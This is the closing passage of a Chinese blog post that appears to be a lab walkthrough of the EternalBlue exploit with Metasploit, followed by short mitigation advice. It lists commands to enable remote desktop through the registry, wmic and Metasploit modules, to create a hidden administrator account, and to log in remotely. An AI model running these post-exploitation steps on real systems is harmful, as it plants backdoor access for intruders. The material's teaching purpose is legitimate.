<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t REG_DWORD /d 0 /f</span><br><span class="line"></span><br><span class="line">wmic RDTOGGLE WHERE ServerName=&#x27;%COMPUTERNAME%&#x27; call SetAllowTSConnections 1</span><br><span class="line"></span><br><span class="line">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">开启远程服务：net user user02 /active:yes</span><br></pre></td></tr></table></figure>

<blockquote>
<p>如果打开了，但是查不到 <code>3389</code> 端口，那就自己去查，因为本次也是这种情况</p>
</blockquote>
<p>首先，我们需要确保目标Windows设备开启了远程桌面功能（需要开启多个服务），不过我们的 getgui 脚本可以帮我们搞定。我们可以使用-e参数确保目标设备开启了远程桌面功能（重启之后同样会自动开启），我们输入： <code>run getgui -e</code> 或者 <code>run post/windows/manage/enable_rdp</code> 。</p>
<h3 id="10、命令行添加登录用户"><a href="#10、命令行添加登录用户" class="headerlink" title="10、命令行添加登录用户"></a>10、命令行添加登录用户</h3><p>查看用户 <code>net user</code> </p>
<p>新建用户 <code>net user user02 passwd /add</code> （<code>user02</code> 是用户名，<code>passwd</code> 是密码）</p>
<p>添加进管理员组：<code>net localgroup Administrators user02 /add</code> </p>
<h3 id="11、远程登录"><a href="#11、远程登录" class="headerlink" title="11、远程登录"></a>11、远程登录</h3><p>方法一：本机开启远程桌面连接 <code>192.168.0.64:3389</code></p>
<p>方法二：kali终端执行 <code>rdesktop 192.168.0.64</code></p>
<h2 id="永恒之蓝漏洞解决办法"><a href="#永恒之蓝漏洞解决办法" class="headerlink" title="永恒之蓝漏洞解决办法"></a>永恒之蓝漏洞解决办法</h2><p>1、开启防火墙</p>
<p>2、对系统进行升级或者打补丁</p>
<p>3、关闭相应的端口</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%BD%91%E7%BB%9C/" rel="tag"># 网络</a>
              <a href="/tags/%E6%BC%8F%E6%B4%9E/" rel="tag"># 漏洞</a>
              <a href="/tags/%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9D/" rel="tag"># 永恒之蓝</a>
              <a href="/tags/MSF/" rel="tag"># MSF</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/11/10/VMware%E4%B8%8E%E7%BD%91%E7%BB%9C%E5%9F%BA%E6%9C%AC%E7%9F%A5%E8%AF%86/" rel="prev" title="VMware与网络基本知识">
                  <i class="fa fa-angle-left"></i> VMware与网络基本知识
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/11/13/phpstudy%E6%90%AD%E5%BB%BA%E7%BD%91%E7%AB%99/" rel="next" title="phpstudy搭建网站">
                  phpstudy搭建网站 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">John Doe</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
